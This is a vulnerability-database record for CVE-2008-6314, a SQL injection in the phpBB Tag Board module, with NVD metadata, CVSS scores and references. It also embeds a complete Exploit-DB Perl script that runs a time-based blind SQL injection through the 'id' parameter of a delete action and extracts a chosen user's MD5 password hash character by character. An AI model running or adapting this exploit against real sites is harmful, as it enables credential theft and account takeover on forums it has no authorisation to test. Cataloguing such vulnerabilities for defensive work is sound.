ID CVE-2008-6314Type cveReporter cve@mitre.orgModified 2017-09-29T01:33:00
Description
SQL injection vulnerability in tag_board.php in the Tag Board module 4.0 and earlier for phpBB allows remote attackers to execute arbitrary SQL commands via the id parameter in a delete action.
{"id": "CVE-2008-6314", "bulletinFamily": "NVD", "title": "CVE-2008-6314", "description": "SQL injection vulnerability in tag_board.php in the Tag Board module 4.0 and earlier for phpBB allows remote attackers to execute arbitrary SQL commands via the id parameter in a delete action.", "published": "2009-02-27T11:30:00", "modified": "2017-09-29T01:33:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-6314", "reporter": "cve@mitre.org", "references": ["https://exchange.xforce.ibmcloud.com/vulnerabilities/47163", "http://secunia.com/advisories/33031", "https://www.exploit-db.com/exploits/7386", "http://www.securityfocus.com/bid/32701", "http://osvdb.org/50600"], "cvelist": ["CVE-2008-6314"], "type": "cve", "lastseen": "2021-02-02T05:35:20", "edition": 6, "viewCount": 5, "enchantments": {"dependencies": {"references": [{"type": "exploitdb", "idList": ["EDB-ID:7386"]}], "modified": "2021-02-02T05:35:20", "rev": 2}, "score": {"value": 7.2, "vector": "NONE", "modified": "2021-02-02T05:35:20", "rev": 2}, "vulnersScore": 7.2}, "cpe": ["cpe:/a:phpbb:tag_board:4.0"], "affectedSoftware": [{"cpeName": "phpbb:tag_board", "name": "phpbb tag board", "operator": "le", "version": "4.0"}], "cvss2": {"cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": true, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {}, "cpe23": ["cpe:2.3:a:phpbb:tag_board:4.0:*:*:*:*:*:*:*"], "cwe": ["CWE-89"], "scheme": null, "affectedConfiguration": [{"cpeName": "phpbb:phpbb", "name": "phpbb", "operator": "eq", "version": "*"}], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"children": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:a:phpbb:phpbb:*:*:*:*:*:*:*:*", "vulnerable": false}], "operator": "OR"}, {"cpe_match": [{"cpe23Uri": "cpe:2.3:a:phpbb:tag_board:4.0:*:*:*:*:*:*:*", "versionEndIncluding": "4.0", "vulnerable": true}], "operator": "OR"}], "operator": "AND"}]}, "extraReferences": [{"name": "tagboard-tagboard-sql-injection(47163)", "refsource": "XF", "tags": [], "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/47163"}, {"name": "32701", "refsource": "BID", "tags": ["Exploit"], "url": "http://www.securityfocus.com/bid/32701"}, {"name": "33031", "refsource": "SECUNIA", "tags": ["Vendor Advisory"], "url": "http://secunia.com/advisories/33031"}, {"name": "7386", "refsource": "EXPLOIT-DB", "tags": [], "url": "https://www.exploit-db.com/exploits/7386"}, {"name": "50600", "refsource": "OSVDB", "tags": [], "url": "http://osvdb.org/50600"}]}
{"exploitdb": [{"lastseen": "2016-02-01T03:06:11", "description": "phpBB 3 (Mod Tag Board <= 4) Remote Blind SQL Injection Exploit. CVE-2008-6314. Webapps exploit for php platform", "published": "2008-12-08T00:00:00", "type": "exploitdb", "title": "phpBB 3 Mod Tag Board <= 4 Remote Blind SQL Injection Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-6314"], "modified": "2008-12-08T00:00:00", "id": "EDB-ID:7386", "href": "https://www.exploit-db.com/exploits/7386/", "sourceData": "#!/usr/bin/perl \n# ---------------------------------------------------------------\n# phpBB 3 (Mod Tag Board <= 4) Remote Blind SQL Injection Exploit \n# by athos - staker[at]hotmail[dot]it\n# http://bx67212.netsons.org/forum/viewforum.php?f=3\n# ---------------------------------------------------------------\n# Note: Works regardless PHP.ini settings!\n# Thanks meh also know as cHoBi\n# ---------------------------------------------------------------\n\nuse strict;\nuse LWP::UserAgent;\n\nmy ($hash,$time1,$time2);\n\nmy @chars = (48..57, 97..102); \nmy $http = new LWP::UserAgent;\n\nmy $host = shift;\nmy $table = shift;\nmy $myid = shift or &usage;\n\n\nsub injection\n{\n my ($sub,$char) = @_;\n \n return \"/tag_board.php?mode=controlpanel&action=delete&id=\".\n \"1+and+(select+if((ascii(substring(user_password,${sub},1)\".\n \")=${char}),benchmark(230000000,char(0)),0)+from+${table}_us\".\n \"ers+where+user_id=${myid})--\";\n}\n\n\nsub usage\n{\n print STDOUT \"Usage: perl $0 [host] [table_prefix] [user_id]\\n\";\n print STDOUT \"Howto: perl $0 http://localhost/phpBB phpbb 2\\n\";\n print STDOUT \"by athos - staker[at]hotmail[dot]it\\n\";\n exit;\n}\n\n\nsyswrite(STDOUT,'Hash MD5: ');\n\nfor my $i(1..33)\n{\n for my $j(0..16)\n {\n $time1 = time();\n\n $http->get($host.injection($i,$chars[$j]));\n \n $time2 = time();\n\n if($time2 - $time1 > 6)\n {\n syswrite(STDOUT,chr($chars[$j]));\n $hash .= chr($chars[$j]); \n last;\n }\n \n if($i == 1 && length $hash < 0)\n {\n syswrite(STDOUT,\"Exploit Failed!\\n\");\n exit;\n } \n }\n}\n\n# milw0rm.com [2008-12-08]\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/7386/"}]}
